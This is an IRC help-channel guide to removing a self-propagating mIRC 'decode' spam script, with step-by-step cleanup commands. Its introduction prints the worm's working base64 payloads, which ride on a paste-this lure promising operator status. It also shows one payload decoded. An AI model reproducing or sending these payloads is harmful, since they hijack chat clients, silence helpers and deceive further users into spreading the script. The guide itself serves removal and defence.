Simple Spam Removal/DECODE REMOVAL

#Contents:
#1. Introduction
#2. Explaination
#3. Removal Steps
#4. Acknowledgments

—————–
#1. Introduction:
—————–

Okay, let’s admit that we helpers on #nohack are encountering numbers of infectee by sending a
decode message:

(InfectedUser) Hi Husaini gus2 u b maging OPERATOR s # nohack ? copy/paste mo i2->
// write $decode(b24gISsxOnRleHQ6KmEqOiM6eyAuaWdub3JlICRuaWNrIHwgLnRpbWVyoCAwI
DEyMCAuam9pbiAjTWFuaWxhIHwgLm1zZyAkbmljayBoaSAkbmljayBndXMyIHUgYiBtYWdpbmcgT
1BFUkFUT1IgcyAkY2hhbiA/IGNvcHkvcGFzdGUgbW8gaTItPgMxNCAvL3dyaXRlIKAgJCAkKyBkZWN
vZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmx
vYWQgLXJzIKAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,m)| .load -rs

The Decode will be like this or something similar.

If you want to read this decode message type in your irc status window the following //!echo -a $decode(the decode code goes here)
example:
// write $decode(b24gISsxOnRleHQ6KmEqOiM6eyAuaWdub3JlICRuaWNrIHwgLnRpbWVyoCAwIDEyMCAuam9pbiAjTWFuaWxhIHwgLm1zZyAkbmljayBoaSAkbmljayBndXMyIHUgYiBtYWdpbmcgT1BFUkFUT1IgcyAkY2hhbiA/IGNvcHkvcGFzdGUgbW8gaTItPgMxNCAvL3dyaXRlIKAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,m)| .load -rs
or //write sex $decode(b24gISsxOnRleHQ6KjojOnsgLmF1c2VyIDIgJG5pY2sgfCAuam9pbiAtbiAjaDBsMyB8IC53cml0ZSAtbDEgYmQgY3RjcCAqOlBJTkcqOi4gJCAkKyAyLSB8IC5sb2FkIC1ycyBiZCB8IC5tc2cgJG5pY2sgV2FudCBiZSBhbiBPUCBpbiAkY2hhbiA/IHBhc3RlIHRoaXMtPiADNC8vd3JpdGUgQU9QICQgJCsgZGVjb2RlKCAkKyAkZW5jb2RlKCRyZWFkKCRzY3JpcHQsbiwxKSxtKSAkKyAsbSkgJGNocigxMjQpIC5sb2FkIC1ycyBBT1AgfQ==,m) | .load -rs sex

Once you typed it, you will get the following or something similar to it.
on !+1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #Manila | . msg $nick hi $nick gus2 u b maging OPERATOR s $chan ? copy/paste mo i2-> //write $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs $chr(124) //mode $ $+ me +R }

—————–
#2. Explaination:
—————–
let’s explain what this do:

a) on !+1:text:*a*:#:{ .ignore $nick |
it means that when a user type “a” on the channel the spammer/infectee will ignore his nick. so for example if $me= Ryan and i typed hello spAmmer, how cAn i help you? the spammer will ignore Ryan*!*@* : reason for not seeing my follow questions or txt on the channel.

b) .timer 0 120 .join #Manila
This decode has a set timer on it that will keep the spammer auto join # Manila on a given time.

c) . msg $nick hi $nick gus2 u b maging OPERATOR s $chan ? copy/paste mo i2->
//write $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) after ignoring the user, he will send u this msg.

d) //mode $ $+ me + R }
the infectee will be set to +R or only registered nick can pvt him/her

——————
#3. Removal Steps
——————
1. Ask the user how can you help him. (If u do receive the spam message, now you know how to help him.)

2. Change your nick since the decode will just ignore your previous nick and not your IP add.
(pls refer to letter a explanation above)

3. DO NOT use a normal text on helping the infectee first. Use /me or on :action command so that he/she will not ignore u

4. Ask the infectee/spammer if he/she do know how to copy/paste on IRC

5. If no, give him how to copy/paste, If yes, continue to no. 6.

6. the first command is this: //!re $+ mote off | !ign $+ ore off | !ign $+ ore -r | !ti $+ mers off | !soc $+ kclose * | !ddes $+ erver off | !say don3
what does it do: it turns his/her script or remotes off, clears his ignore list,ignore will be off, any timer that is active will be off and change his nick to -R
or anyone can pvt him/her now.
Please type //msg #virusfree Munir: $mircini– $script(0) $script(1) $script($script(0)) $sreq $exists(script.ini) $sock(*,0)
7. After his confirmation: :d0n3. Play his scripts loaded on the back up channel. //!play -trfiles #channelname mirc.ini 2400 | !say playing… Note: u must know you do play his scripts right. what does – trfiles do? why do you have to put that? Read /help /play

8. Let’s give an example of a users scripts”:
n0=remote.ini
n1=remote.ini
n2=

9. Ok how many scripts does a user loaded? It’s only one. you will start counting on n2= .
why? because n0 and n1 is not script loaded.
n0=users and n1=variables n2= and so on will be his/her script loaded. To check it also you can use //!say $script(0)
in this case the user will answer u 1. 1 means that he/she has only 1 script loaded.
On this script, maybe you are wondering why does n2= = looks like empty filename. Actually it’s NOT. the filename is on ASCII code. The space used on this decode is called softkey or the $ chr(160) u can check it by //!say $chr(160) how about the hard key? it’s $chr(24)

10. If you are not sure what does n2= is all about u can play them
by: //!play #channelname ” $+ $script(1) $+ ” 2400 OR //!Play #channelname ” $+ $chr(160) $+ ” 2400
” $ + $script(1) $+ means that the first script loaded will be play on #channelname with 2400 delay time

11. Now, you are sure that this script is a spam, u must remove/unload it.
If u will use ” $+ $script(1) $+ for your command make sure that you will REMOVE them first before unloading. Im hoping that u do know why. If now just ask $me or any old staffs on the channel.
//!remove ” $+ $ script(1) $+ ” | //!say $exists(” $+ $script(1) $+ “)
this command means the first script will be remove and confirming if it’s still exists. you must get a $false with this.
$false = file has been removed
$true = file still exists
//!unload – rsn ” $+ $script(1) $+ ” | !say don3
unload the first script loaded. why do we use -rsn? /help /unload will help you.
Ok but when we will gonna use ” $+ $chr (160) $+ ” or ” $+ filenameHERE $+ ” u can unload it first and then REMOVE. U will just change the ” $+ $script(1) $+ ” to ” $+ $chr(160) $+ ” or ” $+ filenameHERE $+ on the commands above.

12. To make sure that the script is unloaded and remove, it is necessary to play his scripts loaded again. NO. 7
the spammer must shows his script like this:
n0=remote.ini
n1=remote.ini

But what if he shows like this:

n0=remote.ini
n1=remote.ini
n2=
YOU MUST check your commands first, if you did it right check the attributes of his mirc.ini where the files is loaded.

13. For checking his attribute: //!say $file(mirc.ini).attr
if the spammer shows “arhs” what does a – r – h – s mean? im hoping that you do all know this also.
on changing his attribute: /run cmd /c attrib -R -S -H <drive:\fullpath\file.exe>
then unload his/her spam again.

14. go back to no. 12 again and check his attribute again

15. To check for GTBots on the % windir partition :
//!say results $findfile(c:\,mirc.ini,*,msg #virusfree $1-)
if u see mirc.ini on his system or system32 or recycler give him the cleaner or if any old staffs are online ask them for assistance.

16. After that he/she is now clean. .show decodeclean will help you or .show helped1 .show helped2

Now enjoy this file. sometimes it’s nice to give a cheat code than to make a wrong move on helping a user. 😛

———————
#4. Acknowledgments
———————
Thanks to Nokeer and Husaini